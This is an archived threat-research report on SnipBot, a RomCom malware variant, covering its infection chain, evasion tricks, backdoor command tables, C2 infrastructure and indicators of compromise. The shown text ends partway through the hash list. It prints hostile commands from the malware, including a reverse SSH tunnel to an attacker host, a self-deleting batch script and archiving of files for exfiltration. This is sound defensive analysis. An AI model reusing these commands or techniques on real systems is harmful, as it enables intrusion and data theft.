{
	"id": "067351ef-0cff-4b70-8850-e0fb1c125b81",
	"created_at": "2026-04-06T00:18:44.575226Z",
	"updated_at": "2026-04-10T13:11:38.134441Z",
	"deleted_at": null,
	"sha1_hash": "353219416037a7d696f24672037c80518463ac24",
	"title": "Inside SnipBot: The Latest RomCom Malware Variant",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2507369,
	"plain_text": "Inside SnipBot: The Latest RomCom Malware Variant\r\nBy Yaron Samuel, Dominik Reichel\r\nPublished: 2024-09-23 · Archived: 2026-04-05 14:04:29 UTC\r\nExecutive Summary\r\nWe recently discovered a novel version of the RomCom malware family called SnipBot and, for the first time,\r\nshow post-infection activity from the attacker on a victim system. This new strain makes use of new tricks and\r\nunique code obfuscation methods in addition to those seen in previous versions of RomCom 3.0 and PEAPOD\r\n(RomCom 4.0).\r\nIn early April, our sandbox Advanced WildFire discovered an unusual DLL module that turned out to be part of a\r\nbroader tool set called SnipBot. By examining the malware sample and using Cortex XDR telemetry data, we\r\nwere able to reconstruct the infection chain and the attacker's subsequent actions.\r\nWe also discovered more related malware strains dating back to December 2023. Although the aim of the attacker\r\nis unknown, the behavior we observed indicates an attempt to pivot through the victim's network and exfiltrate\r\ncertain files.\r\nSnipBot gives the attacker the ability to execute commands and download additional modules onto a victim's\r\nsystem. It is a new version of the RomCom malware that is mainly based on RomCom 3.0. However, it also\r\ncontains techniques seen in its offshoot PEAPOD called RomCom 4.0 by Trend Micro. Therefore, we’ve assigned\r\nit version 5.0.\r\nThis threat operates in several stages, with the initial downloader always being an executable, followed by further\r\nEXEs or DLLs. 
The downloader we observed was consistently signed with a valid code signing certificate that the\r\nthreat actor likely obtained either through certificate theft or fraud to purchase a new certificate, while subsequent\r\nmodules were unsigned.\r\nIn collaboration with Sophos, which initially found this new RomCom version in February during an incident, we\r\ninvestigated the malware's capabilities and gathered some knowledge about the attackers' activity on a victim’s\r\nsystem.\r\nPalo Alto Networks customers are better protected from the SnipBot malware through products like Cortex and\r\nAdvanced WildFire, with its different memory analysis features. Advanced WildFire classifies the SnipBot\r\nmalware samples in this article as malicious. Advanced URL Filtering and Advanced DNS Security classify\r\nknown URLs and domains associated with this activity as malicious.\r\nIf you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response\r\nteam.\r\nMalware Background\r\nhttps://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/\r\nPage 1 of 25\n\nRomCom RAT is a malware family that has evolved over the years to include different features and attack\r\nmethods. The threat actor using RomCom has been active since at least 2022. They engage in ransomware,\r\nextortion and targeted credential gathering, likely to support intelligence-gathering operations. RomCom has made\r\nmultiple advancements, leading to its newest iteration called SnipBot, which employs new commands and evasion\r\ntechniques.\r\nThe SnipBot variant of RomCom leverages a basic set of features that allows the attacker to run commands on a\r\nvictim's system and download additional modules. 
The initial payload is always either an executable downloader\r\nmasked as a PDF file or an actual PDF file sent to the victim in an email that leads to an executable.\r\nThe earliest initial sample of SnipBot we found was a PDF file that shows distorted text that states a font is\r\nmissing that’s needed to show it correctly. If the victim clicks on the contained link that’s purported to download\r\nand install the font package, they will instead download the SnipBot downloader.\r\nSnipBot consists of several stages where the initial downloader is always an executable file and the remaining\r\npayloads are either EXEs or DLLs. The downloader is always signed with a legitimate and valid code signing\r\ncertificate. We don’t know how the threat actors obtain these certificates, but it’s likely they steal them or gain\r\nthem by fraud. Subsequent modules were not signed.\r\nEmail Infection Vector\r\nBy reviewing Cortex XDR telemetry data and reverse engineering the initial sample, we were able to recreate the\r\nwhole infection chain. The initial infection vector in our case was an email that contained a link that redirects\r\ntwice to the SnipBot downloader.\r\nFigure 1 shows the chain of URLs from the initial one contained in the email to the final SnipBot downloader file\r\nlink. The attacker registered the domains fastshare[.]click and docstorage[.]link. The website temp[.]sh is a\r\nlegitimate file sharing service with a set hosting period of three days.\r\nFigure 1. URL chain from the email to the downloader (icon sources).\r\nWe discovered another chain of links that was likely used by the same attacker to deliver a similar SnipBot\r\ndownloader variant. The distinct initial domain and the similar downloader file name imply this was part of a\r\ncampaign targeting multiple victims.\r\nFigure 2 shows the chain of URLs used in a second attack. 
The attacker created the domain publicshare[.]link;\r\nit is not a legitimate file sharing service.\r\nFigure 2. Different URL chain from the email to the downloader (icon sources).\r\nSnipBot Malware\r\nFigure 3 shows the infection chain of the different SnipBot stages. The initial downloader Attachment_Medical report.exe\r\nis a 64-bit Windows executable (SHA256:\r\n57e59b156a3ff2a3333075baef684f49c63069d296b3b036ced9ed781fd42312) disguised as a PDF file. It is signed\r\nwith a presumably stolen or spoofed certificate from CC Byg og Udlejning ApS, which is a company located in\r\nDenmark.\r\nFigure 3. SnipBot execution flow from the initial EXE downloader to the main bot file single.dll\r\n(icon sources).\r\nThis downloader uses two simple yet effective anti-sandbox tricks. The first one checks for the original file name\r\nby comparing the hashed process name against a hard-coded value. The second one checks whether there are at\r\nleast 100 entries in the HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RecentDocs registry key,\r\nwhich is usually the case on a regular user’s system but less likely to be the case in a sandbox system.\r\nFigure 4 shows the RecentDocs registry key of a typical Windows system with more than 100 values present.\r\nFigure 4. RecentDocs registry key of a typical Windows system.\r\nThe downloader is also obfuscated with a window message-based control-flow obfuscation algorithm. The\r\nmalware code is split up into multiple unordered blocks that are triggered by custom window messages.\r\nTo accomplish this, a window is created whose message callback (window procedure) contains these code blocks. 
The window\r\nmessage queue is used to call each block in its original order.\r\nThe first message block is triggered by sending the initial message and then each block sends the next message\r\nwhen it’s done. Additionally, each block can also send nested messages, which makes it even more challenging to\r\nfollow the execution flow.\r\nMost of the strings, such as the command and control (C2) domain name and all the names of dynamically\r\nresolved API functions, are encrypted. The threat actor likely did this to prevent easy static detection, thus making\r\nmalware analysis more time-consuming.\r\nUpon execution, the downloader contacts the first C2 domain xeontime[.]com and tries to get a PDF file and the\r\nfirst payload. We couldn’t recover the original downloaded first payload, but for an unknown reason, the attacker\r\nlater downloaded the same payload with different configuration data and started it manually. We were able to\r\nobtain this file and could continue our analysis.\r\nThe threat downloads the PDF to the local user’s temporary folder with a random name before opening it. The\r\nfirst payload is a DLL file (internally named config-pdf.dll) that the threat executes in memory. It has an exported\r\nfunction named GetStore that contains its malicious code.\r\nThis DLL file’s purpose is to download the next stage COM DLL named keyprov.dll from the second C2\r\ndrvmcprotect[.]com and inject it into Explorer. For this, it uses COM hijacking to register the file as the thumbnail\r\ncache library in the registry hive of the current user.\r\nWhen restarting explorer.exe, the DLL gets loaded into its address space and executed. 
While this is a reliable\r\nmethod of loading a payload into Explorer, forcing it to terminate can result in a crash, as it did on the victim's\r\nmachine.\r\nFigure 5 illustrates how the registered COM DLL keyprov.dll loads into explorer.exe after restarting.\r\nFigure 5. Explorer Injection via COM hijacking as shown with Process Hacker 2.\r\nTo download the COM DLL from the C2 server, config-pdf.dll sends the command get_update_manager2.\r\nAdditionally, the first payload gets a second encrypted DLL by sending the command get_update_inet2.\r\nThis payload (internally named single.dll) gets stored in the registry in the key\r\nHKCU\\SOFTWARE\\AppDataSoft\\Software as a binary value named trem1. Finally, in the same registry key, the\r\nthreat creates another binary value named trem3 that contains the string UPDE1. The threat likely uses this value\r\nto keep track of the number of updates for the registry payloads.\r\nAfter keyprov.dll gets loaded into Explorer, it tries to imitate a real COM provider. It is able to do so as it’s an\r\nordinary DLL with the needed export functions DllGetClassObject and DllCanUnloadNow. To do so, the code in\r\nkeyprov.dll’s DllGetClassObject function acts as a forwarder to the same-named function in shdocvw.dll, which is\r\na legitimate COM DLL also loaded in explorer.exe.\r\nThe code in DllMain contains the two key tasks of the DLL. These tasks are to decrypt and execute the encrypted\r\npayload in the registry and to create a network listener for incoming commands.\r\nThe threat’s first task is to decrypt and execute two DLL payloads from the registry values trem1 and trem2. In our\r\ncase, only the payload stored in trem1 got downloaded from the C2 server.\r\nThe second task is to listen on port 1342 for the following incoming string commands sent over TCP. 
Table 1\r\nshows the commands implemented in keyprov.dll related to the bot’s operation.\r\nCommand Description\r\ndelete bot\r\nDelete the following registry keys:\r\nHKCU\\SOFTWARE\\AppDataSoft\\Software\r\nHKCU\\SOFTWARE\\AppDataSoft\r\nHKCU\\SOFTWARE\\Classes\\CLSID\\{2155fee3-2419-4373-b102-6843707eb41f}\\InprocServer32\r\nHKCU\\SOFTWARE\\Classes\\CLSID\\{2155fee3-2419-4373-b102-6843707eb41f}\r\nCreate a BAT file %LOCALAPPDATA%\\temp.cmd with content:\r\n:rep\\r\\ntimeout 5\\r\\nrmdir /Q /S %1\\r\\nif not errorlevel 0 goto rep\\r\\ndel /q %0\\r\\n\r\nCreate the following string to run the batch file via CreateProcess:\r\nC:\\Users\\\u003cusername\u003e\\AppData\\Local\\temp.cmd C:\\Users\\\r\n\u003cusername\u003e\\AppData\\Local\\KeyStore \r\nRestart the Explorer to unload any payloads:\r\ncmd /C taskkill /f /im explorer.exe \u0026\u0026 start explorer.exe \r\nupdate bot\r\nwork\r\nDecrypt and execute the payload stored in the trem2 value\r\nstart bot file Decrypt and execute the payload stored in the trem2 value\r\nTable 1. Commands for keyprov.dll’s network listener.\r\nThe main SnipBot file single.dll is a backdoor that gives the attacker multiple options to execute commands or\r\ndownload and run additional payloads. All strings are encrypted, with each having its own decryption key.\r\nThe file creates a mutex named SnipMutex, from which the malware’s name is derived. 
For the initial C2 contact,\r\nthe threat sends a string that is made from the following information collected from the victim’s system:\r\nComputer/domain name\r\nMAC address\r\nWindows build number\r\nWhether the machine is a Windows server\r\nTable 2 shows 27 commands in SnipBot’s main module single.dll.\r\nCommand Description\r\n0x1\r\nGet the total and free bytes of all available drives (RAM disk, CD-ROM, network,\r\nfixed/removable media, unknown) and send the information to the C2 server\r\n0x2\r\nGet the file and directory structure of an attacker-provided directory path and send the result to\r\nthe C2 server\r\n0x3\r\nRun an attacker-provided command-line command with a hidden cmd.exe process and\r\nthen terminate cmd.exe\r\nSend the command-line output to the C2 server\r\n0x4 Upload the file content of an attacker-provided file path to the C2 server\r\n0x5\r\nDownload the file temp-log from the C2 server to disk:\r\n%LOCALAPPDATA%\\temp-log\r\nReturn the string completed to the C2 when successful\r\n0xC\r\nExecute SnippingTool.dll via rundll32.exe and the argument single:\r\nrundll32.exe %LOCALAPPDATA%\\KeyStore\\SnippingTool.dll,Main single\r\nSend SnippingTool.zip to the C2 server, which is presumably the output of\r\nSnippingTool.dll, and then delete the file:\r\n%LOCALAPPDATA%\\KeyStore\\SnippingTool.zip\r\n0xD\r\nExecute SnippingTool.dll via rundll32.exe and an attacker-provided argument:\r\nrundll32.exe %LOCALAPPDATA%\\KeyStore\\SnippingTool.dll,Main \u003cAttackerProvidedArg\u003e\r\nReturn the string completed to the C2 when successful\r\n0xE\r\nRename SnippingTool.zip to SnippingTool_s.zip:\r\n%LOCALAPPDATA%\\KeyStore\\SnippingTool.zip\r\n→ %LOCALAPPDATA%\\KeyStore\\SnippingTool_s.zip\r\nSend SnippingTool_s.zip to the C2 server and delete the file:\r\n%LOCALAPPDATA%\\KeyStore\\SnippingTool_s.zip\r\n0xF Send a list of running processes (file names) and their 
IDs to the C2 server\r\n0x11\r\nDelete the bot by sending the delete bot string command to the keyprov.dll network listener\r\nReturn the string completed to the C2 when successful\r\n0x12\r\nDownload an additional payload SnippingTool.dll from the C2 server to disk:\r\n%LOCALAPPDATA%\\KeyStore\\SnippingTool.dll\r\nReturn the string completed to the C2 when successful\r\n0x13\r\nCreate the directory DataCache:\r\n%LOCALAPPDATA%\\DataCache\r\nDownload additional payload FontCache.dll from the C2 server to disk:\r\n%LOCALAPPDATA%\\DataCache\\FontCache.dll\r\nExecute the payload FontCache.dll via rundll32.exe:\r\nrundll32.exe %LOCALAPPDATA%\\DataCache\\FontCache.dll,Main\r\nReturn the string completed to the C2 when successful\r\n0x14\r\nDownload the file ms-win-tmp.zip from the C2 server to disk:\r\n%LOCALAPPDATA%\\KeyStore\\ms-win-tmp.zip\r\nUnpack ms-win-tmp.zip with a built-in unpacker to %LOCALAPPDATA%\\KeyStore\r\nReturn the string completed to the C2 when successful\r\nDelete the file ms-win-tmp.zip:\r\n%LOCALAPPDATA%\\KeyStore\\ms-win-tmp.zip\r\n0x15\r\nCreate a hidden cmd.exe process to set up a SOCKS proxy with socks5.exe and the\r\nfollowing commands:\r\ncd /d %LOCALAPPDATA%\\KeyStore\\\r\nsocks5.exe 54321\r\nCreate another hidden cmd.exe process to set up an SSH tunnel via plink.exe:\r\n%LOCALAPPDATA%\\Keystore\\plink.exe -ssh -pw \u003cAttackerProvidedPassword\u003e -R\r\n\u003cAttackerProvidedPort\u003e:127.0.0.1:54321 john@\u003cAttackerProvidedAddress\u003e -P\r\n\u003cAttackerProvidedRemotePort\u003e\r\nReturn the following string to the C2 server:\r\nstarted on - \u003cAttackerProvidedAddress\u003e:\u003cAttackerProvidedRemotePort\u003e\r\n\u003cAttackerProvidedPassword\u003e\r\n0x16\r\nTerminate the processes socks5.exe and plink.exe\r\nDelete the files ms-proxy.exe and 
svcnet.exe:\r\n%LOCALAPPDATA%\\KeyStore\\ms-proxy.exe\r\n%LOCALAPPDATA%\\KeyStore\\svcnet.exe\r\nReturn the string completed to the C2 when successful\r\n0x18\r\nUpload all files from the %LOCALAPPDATA%\\Datacache\\ directory to the C2 server and\r\ndelete them afterwards.\r\n0x1A Create a hidden cmd.exe process and wait for incoming 0x1B commands\r\n0x1B\r\nPass an attacker-provided command to the already running hidden cmd.exe process and send\r\nthe output to the C2 server\r\n0x1C\r\nTerminate the process into which single.dll was loaded (explorer.exe or rundll32.exe)\r\nReturn the string completed to the C2 when successful\r\n0x20 Upload all files with the extensions TXT, RTF, XLS, XLSX, ODS, CMD, PDF, VBS, PS1,\r\nONE, KDB, KDBX, DOC, DOCS, ODT, EML, MSG and EMAIL from the following\r\ndirectories to the C2 server:\r\n%USERPROFILE%\\Downloads\r\n%USERPROFILE%\\Desktop\r\n%USERPROFILE%\\Documents\r\n0x26\r\nDownload an additional payload paper.exe from the C2 server to disk and execute it:\r\n%PUBLIC%\\Libraries\\paper.exe\r\nRun 7-Zip to create an archive of tempFolder, which is presumably the output produced\r\nby paper.exe:\r\n%PUBLIC%\\Libraries\\7za.exe a -tzip\r\n%PUBLIC%\\Libraries\\archi.zip -w\r\n%PUBLIC%\\Libraries\\tempFolder\r\nReturn the string completed to the C2 when successful\r\n0x29\r\nRun 7-Zip to create an archive of tempFolder (if archi.zip is not present), presumably the\r\noutput produced by the payload paper.exe:\r\n%PUBLIC%\\Libraries\\7za.exe a -tzip\r\n%PUBLIC%\\Libraries\\archi.zip -w\r\n%PUBLIC%\\Libraries\\tempFolder\r\nSend the result (archi.zip) to the C2 server and delete the files:\r\n%PUBLIC%\\Libraries\\7za.exe\r\n%PUBLIC%\\Libraries\\archi.zip\r\n%PUBLIC%\\Libraries\\paper.exe\r\n0x2A\r\nDownload 7-Zip from the C2 server to disk:\r\n%LOCALAPPDATA%\\KeyStore\\7za.exe\r\nReturn the string completed to the C2 when successful\r\n0x2B\r\nRun 
7-Zip to create an archive of the attacker-provided path:\r\n%LOCALAPPDATA%\\KeyStore\\7za.exe a -tzip\r\n%LOCALAPPDATA%\\KeyStore\\archiveSSL.zip -w \r\n\u003cC2ProvidedPath\u003e\r\nSend the result (archiveSSL.zip) to the C2 server and delete the files:\r\n%PUBLIC%\\Libraries\\7za.exe\r\n%PUBLIC%\\Libraries\\archiveSSL.zip\r\n0x2C\r\nTraverse all processes including system ones, search for one containing the module\r\nSnippingTool.dll and terminate it\r\nReturn the string completed to the C2 when successful\r\nDelete the payload SnippingTool.dll:\r\n%LOCALAPPDATA%\\KeyStore\\SnippingTool.dll\r\n0x2D\r\nDownload additional payload InfoWind.dll from the C2 server to disk:\r\n%LOCALAPPDATA%\\KeyStore\\InfoWind.dll\r\nReturn the string completed to the C2 when successful\r\n0x2E\r\nExecute the payload InfoWind.dll via rundll32.exe:\r\nrundll32.exe %LOCALAPPDATA%\\KeyStore\\InfoWind.dll,stw\r\nSend tempol.zip to the C2 server, which is presumably the output of InfoWind.dll and\r\ndelete the files:\r\n%LOCALAPPDATA%\\KeyStore\\7za.exe\r\n%LOCALAPPDATA%\\KeyStore\\tempol.zip\r\nTable 2. Supported commands of SnipBot’s main module single.dll.\r\nThe main module provides the operator with command-line, uploading and downloading capabilities on a victim’s\r\nsystem. It also allows an attacker to download and execute the following additional payloads from the attacker’s\r\nserver:\r\nSnippingTool.dll\r\nFontCache.dll\r\nInfoWind.dll\r\npaper.exe\r\nsocks5.exe\r\nms-proxy.exe\r\nsvcnet.exe\r\nplink.exe\r\nWhile these file names imply what the payloads might do, we can only speculate about their purposes. 
We haven’t\r\nseen any of these files dropped on a victim’s system during our investigation.\r\nWhen someone sends a command that the threat does not support, it sends the string command: \u003cCmdNumber\u003e\r\ndoes not exist back to the C2 server.\r\nNewer Downloader Versions\r\nWhile conducting analysis for this post, we monitored VirusTotal for any newly submitted downloader samples.\r\nWe found five newer versions that are almost identical in function, but they differ in their implementation. All\r\nsamples were hosted on temp[.]sh, which seems to be a preferred file sharing service of the attacker.\r\nThe newest version differs in the set of dynamically resolved API functions compared to the downloader from our\r\ncase. Also, the window message-based obfuscation code was removed.\r\nThe newest sample of this version we found was named Attachment_CV_June2024.exe (SHA256:\r\n5390ba094cf556f9d7bbb00f90c9ca9e04044847c3293d6e468cb0aaeb688129) and it connected to the C2 domain\r\nlinedrv[.]com to download the decoy PDF and next stage payload.\r\nWe found a slightly older sample named atch_Medical_Report_Scan05202024.exe (SHA256:\r\n0be3116a3edc063283f3693591c388eec67801cdd140a90c4270679e01677501), that had the same signer and the\r\nC2 domain drv2ms[.]com.\r\nThe last sample, whose filename is unknown (SHA256:\r\n2c327087b063e89c376fd84d48af7b855e686936765876da2433485d496cb3a4), was signed by Hangzhou Yueju\r\nApparel Co., Ltd. and it also contacted drv2ms[.]com.\r\nThe second most recent version we found has a few window-related API functions left in the code, but the threat\r\nactors did not use them for any obfuscation techniques. 
This version used another anti-sandbox trick by checking\r\nwhether there are at least 50 sub-keys in the Shell Bags registry key, which is a typical number for a user system.\r\nShell Bags are stored configuration settings within the registry that remember folder display preferences, such as\r\nposition, size and view mode in Windows Explorer.\r\nWe found a sample of this version named atch_List_of_Available_Documents.exe (SHA256:\r\na2f2e88a5e2a3d81f4b130a2f93fb60b3de34550a7332895a084099d99a3d436) that was also signed by Hangzhou\r\nYueju Apparel Co., Ltd. When executed, it connected to the C2 domain olminx[.]com to download the next stage\r\npayload.\r\nThe earliest of these newer versions also used the window-based control-flow obfuscation technique. We found a sample that was\r\nnamed Atch_Data_Breach_Evidence.pdf … Open with Adobe Acrobat.exe (SHA256:\r\n5c71601717bed14da74980ad554ad35d751691b2510653223c699e1f006195b8) that was also signed by Hangzhou\r\nYueju Apparel Co., Ltd., and it connected to olminx[.]com.\r\nEarlier Versions\r\nThe earliest version of SnipBot we could find was submitted from Ukraine to VirusTotal in December 2023. The\r\ninitial infection vector was a PDF file named резюме.pdf. When opened, a message box appears saying the font\r\npackage AdSlavicF is missing, luring the victim into clicking on the link to install it and show the content\r\ncorrectly.\r\nFigure 6 shows the PDF content with the unresolved text and the message indicating to click on the URL on top.\r\nWhen the victim clicks the link, they’re redirected to the website\r\nadobe.cloudcreative[.]digital/downloads/adobe/fontpackage/, which is meant to look like a legitimate Adobe site.\r\nThe name and logo shown are the work of a threat actor attempting to impersonate a legitimate organization. They\r\ndo not represent an actual affiliation with that organization. 
The threat actor’s impersonation does not imply a\r\nvulnerability in the legitimate organization’s products or services.\r\nFigure 6. PDF lure document leading to the SnipBot downloader.\r\nFigure 7 shows the landing page at adobe.cloudcreative[.]digital impersonating the legitimate Adobe download\r\nsite. When the victim clicks on the “Download Font Package” button, a file download dialog appears.\r\nFigure 7. Fake Adobe website leading to the SnipBot downloader.\r\nFigure 8 shows a dialog that simulates a legitimate Adobe font package download. But instead, the initial SnipBot\r\ndownloader gets downloaded from temp[.]sh/VwnkO/AdobeFontPackCx6416.exe.\r\nFigure 8. Download dialog of a fake Adobe website leading to the SnipBot downloader.\r\nThe executable AdobeFontPackCx6416.exe (SHA256:\r\ncfb1e3cc05d575b86db6c85267a52d8f1e6785b106797319a72dd6d19b4dc317) is an earlier and simpler version of\r\nthe initial downloader from our incident. It also has a PDF icon, and it is signed with a valid certificate by\r\nCOSMART LLC.\r\nThe downloader checks for the original filename for full execution and dynamically resolves all functions by API\r\nhashing. It connects to the C2 server at ilogicflow[.]com to download the next stage, which we couldn’t obtain as\r\nthe server wasn’t online anymore.\r\nThe file also seems to download a real font named AdSlavicF.ttf to the same directory as the SnipBot downloader\r\nand install it via InstallFontFile from the Windows library fontext.dll. 
We can’t verify if this is the missing font\r\nthat makes the document’s content visible or just a random one used to make the chain of events look more\r\nlegitimate.\r\nWe also found an earlier version of config-pdf.dll (SHA256:\r\nb9677c50b20a1ed951962edcb593cce5f1ed9c742bc7bff827a6fc420202b045) submitted from Ukraine to\r\nVirusTotal in January 2024. This version is not a DLL file but an EXE file submitted as webtime-e.exe. This file\r\nconnected to the C2 server at webtimeapi[.]com to download earlier versions of keyprov.dll and single.dll.\r\nThe earlier version of keyprov.dll was dropped as libapi.dll (SHA256:\r\n9f635fa106dbe7181b4162266379703b3fdf53408e5b8faa6aeee08f1965d3a2) and was also created as a COM\r\nDLL. Again, the threat used COM hijacking to register the file as the sync registration library in the registry hive\r\nof the current user and to load it into the Explorer.\r\nThe earlier version of single.dll was encrypted and stored in the registry key\r\nHKCU\\SOFTWARE\\AppDataHigh\\Software as a binary value named state1. Also, it stored the string UPDE1 in a\r\nbinary value named state2 under the same key.\r\nAnother sample of an earlier version named CV_for_a_job.exe (SHA256:\r\n5b30a5b71ef795e07c91b7a43b3c1113894a82ddffc212a2fa71eebc078f5118) was submitted to VirusTotal in\r\nFebruary 2024. It was signed with a legitimate certificate from KHAROS LLC.\r\nThe file checks for the original process name and dynamically resolves functions by API hashing. 
It was hosted on\r\nthe server resolved by the domain name 1drv.fileshare[.]direct, a fake file sharing service set up by the attacker.\r\nThis sample drops and opens an embedded empty PDF file named AdobeARM.log.pdf instead of downloading it.\r\nIt only connected to the C2 server at certifysop[.]com to download and execute the next stage payload from\r\nmemory.\r\nAll earlier versions only checked whether the process name was the original given filename as an anti-sandbox\r\nevasion method. They didn’t use any registry-related tricks.\r\nPost-Infection Activity\r\nWith the help of Cortex XDR telemetry data, we recreated post-infection activity from the attacker, which was\r\nmostly command-line commands. A timeline from the initial infection to the last seen command is shown below.\r\nFigure 9 shows the attacker's post-infection behavior on April 4, which occurred over a period of roughly four\r\nhours.\r\nFigure 9. Timeline of post-infection attacker activity.\r\nWith the command-line functionality of SnipBot’s main module single.dll, the attacker first tried to gather\r\ninformation about the company’s internal network, including the domain controller. Afterwards, attackers\r\nattempted to exfiltrate a list of different files from the victim’s documents, downloads and OneDrive folders to the\r\nserver with the IP address 91.92.250[.]104.\r\nThis server sent AD Explorer and WinRAR to the victim’s system for the second discovery phase. 
Before the\r\nexfiltration, the attacker packed the files with WinRAR (renamed as fsutil.exe), while the actual data transfer to\r\nthe server was achieved with the help of the PuTTY Secure Copy client (renamed as dsutil.exe).\r\nTable 3 shows the file types that the attackers target for data exfiltration.\r\nFile type Related Software/Description\r\ndb SQLite database\r\nbbk Unclear, might be a TreePad backup file\r\ndll Windows dynamic-link library\r\nmp4 MP4 digital media container\r\nmsi Microsoft Software Installer\r\nmp3 MP3 digital audio coding\r\nwav Waveform audio format\r\ndbs SQLBase database\r\nexe Windows executable\r\niso Optical disk image\r\navi Audio video interleave\r\nonetoc2 Microsoft OneNote\r\ndcm Digital imaging and communications in medicine\r\nzbf Z-Buffer Radiance\r\nche Unclear, might be related to CHwinEHE software\r\nmov Quicktime multimedia container\r\ncab Cabinet archive\r\ndat Generic data format\r\nmkv Matroska container\r\nxdw DocuWorks\r\nzip Archive format\r\nhwp Hancom Office\r\nwmv Windows media video\r\nmpj Minitab\r\ndes CorelDRAW\r\nmtw Minitab\r\nreg Windows registry\r\nmac Unclear, might be also Minitab\r\ncnt Windows help\r\nchm Windows compiled help\r\nhlp WinHelp\r\nmpg Digital video container\r\nmpeg Digital video container\r\nmkv Matroska container (duplicate)\r\nmts Advanced video coding high definition\r\nvob Video object container\r\nTable 3. Exfiltrated file types.\r\nThis list of file types contains some unusual ones, making any conclusions about the attacker’s motivation\r\ndifficult. 
While some of the types appear to be standard files used to get more information about the victim's\r\nsystem, others appear to pertain to information about the victim's personal health (ZBF, DCM).\r\nThe data exfiltration attempt we observed didn’t seem to run smoothly, as the attacker tried to kill the PuTTY\r\nprocess (taskkill /pid 1628 /f). Afterward, the attacker manually downloaded a new copy of config-pdf.dll to the\r\nvictim's system and started it with rundll32.exe.\r\nWhen we analyzed this file, we found this payload was the missing one downloaded from xeontime[.]com.\r\nHowever, this new version connected to a different C2 domain cethernet[.]com to get additional payloads or\r\ncommands from the attacker.\r\nOne of the last activities we saw was that the attacker used AD Explorer (renamed as fsutil.exe) to create a\r\nsnapshot of the local AD database. We do not know whether this was successful, as the victim’s system was most\r\nlikely a company laptop without any AD access.\r\nFinally, in the second data exfiltration phase, the attacker used WinRAR to create an archive of all files contained\r\nin the folder c:\\essential\\. This is the last activity shown in XDR telemetry data. It’s likely that the attacker\r\nabandoned the victim’s system because its access to company sources was restricted, making it uninteresting for\r\nthe attacker.\r\nCharacteristics\r\nLooking at the malware’s code, we can see that the authors implemented all functionality in a small number of\r\nvery long functions. All files were coded in C++. The code contains a few minor flaws, indicating the attacker has\r\nexperience as a Windows developer, but they are not seasoned professionals.\r\nFor example, Figure 10 shows the API function CreateDirectory() is called twice in a row, which appears to be a\r\ntypical copy and paste mistake.\r\nFigure 10. 
Code flaw by using the API function CreateDirectoryA() twice.\r\nTable 4 shows the C2 and staging domain information with the last active IP addresses.\r\nC2/Staging Domains Last IP Address\r\nfastshare[.]click 52.72.49[.]79\r\n(drv.)docstorage[.]link 212.46.38[.]222\r\npublicshare[.]link 52.72.49[.]79\r\nxeontime[.]com 91.92.250[.]240\r\ndrvmcprotect[.]com 91.92.254[.]54\r\nmcprotect[.]cloud 185.225.74[.]94\r\ncethernet[.]com 91.92.254[.]234\r\nsitepanel[.]top 91.92.254[.]234\r\ndrv2ms[.]com 79.141.170[.]34\r\nolminx[.]com 91.92.250[.]106\r\nilogicflow[.]com 23.184.48[.]90\r\nwebtimeapi[.]com 91.92.242[.]87\r\ndns-msn[.]com 91.92.242[.]87\r\ncertifysop[.]com 23.137.248[.]220\r\nlinedrv[.]com 38.180.5[.]251\r\n(adobe.)cloudcreative[.]digital 23.137.249[.]182\r\n(1drv.)fileshare[.]direct 23.137.249[.]14\r\nTable 4. C2/Staging domain name information.\r\nConclusion\r\nWith the detection capabilities of our advanced Windows sandbox memory scanning tool, we identified an\r\nunusual DLL module as part of a new RomCom version dating back to at least December 2023. This updated\r\nRomCom version called SnipBot uses a custom obfuscation technique and new anti-analysis tricks.\r\nThe attacker's intentions are difficult to discern given the variety of targeted victims, which include organizations\r\nin sectors such as IT services, legal and agriculture. While attackers have occasionally dropped ransomware on\r\nsystems infected with RomCom in the past, this did not occur in our cases or in any of Sophos' incidents. 
We\r\nsuspect this threat actor has shifted its aim away from pure financial gain toward espionage.\r\nCERT-UA has also published further information about the threat actor behind SnipBot, including other tools and\r\nindicators of compromise (IoC).\r\nThis highlights the need for organizations to remain vigilant and adopt advanced security measures to protect their\r\nsystems and data from evolving cyberthreats.\r\nPalo Alto Networks customers are better protected from the SnipBot malware through products like Cortex and\r\nAdvanced WildFire, with its different memory analysis features. Advanced WildFire classifies the SnipBot\r\nmalware samples in this article as malicious. Advanced URL Filtering and Advanced DNS Security classify\r\nknown URLs and domains associated with this activity as malicious.\r\nIf you think you might have been compromised or have an urgent matter, get in touch with the Unit 42 Incident\r\nResponse team or call:\r\nNorth America Toll-Free: 866.486.4842 (866.4.UNIT42)\r\nEMEA: +31.20.299.3130\r\nAPAC: +65.6983.8730\r\nJapan: +81.50.1790.0200\r\nPalo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA\r\nmembers use this intelligence to rapidly deploy protections to their customers and to systematically disrupt\r\nmalicious cyber actors. 
Learn more about the Cyber Threat Alliance.\r\nWe would like to thank Sophos for the collaboration.\r\nIndicators of Compromise\r\nFiles (Read: SHA256 hash - file type)\r\n0be3116a3edc063283f3693591c388eec67801cdd140a90c4270679e01677501 - 64-bit EXE\r\n1cb4ff70f69c988196052eaacf438b1d453bbfb08392e1db3df97c82ed35c154 - 64-bit DLL\r\n2c327087b063e89c376fd84d48af7b855e686936765876da2433485d496cb3a4 - 64-bit EXE\r\n5390ba094cf556f9d7bbb00f90c9ca9e04044847c3293d6e468cb0aaeb688129 - 64-bit EXE\r\n57e59b156a3ff2a3333075baef684f49c63069d296b3b036ced9ed781fd42312 - 64-bit EXE\r\n5b30a5b71ef795e07c91b7a43b3c1113894a82ddffc212a2fa71eebc078f5118 - 64-bit EXE\r\n5c71601717bed14da74980ad554ad35d751691b2510653223c699e1f006195b8 - 64-bit EXE\r\n60d96087c35dadca805b9f0ad1e53b414bcd3341d25d36e0190f1b2bbfd66315 - 64-bit DLL\r\n92c8b63b2dd31cf3ac6512f0da60dabd0ce179023ab68b8838e7dc16ef7e363d - 64-bit DLL\r\na2f2e88a5e2a3d81f4b130a2f93fb60b3de34550a7332895a084099d99a3d436 - 64-bit EXE\r\nb9677c50b20a1ed951962edcb593cce5f1ed9c742bc7bff827a6fc420202b045 - 64-bit EXE\r\ncfb1e3cc05d575b86db6c85267a52d8f1e6785b106797319a72dd6d19b4dc317 - 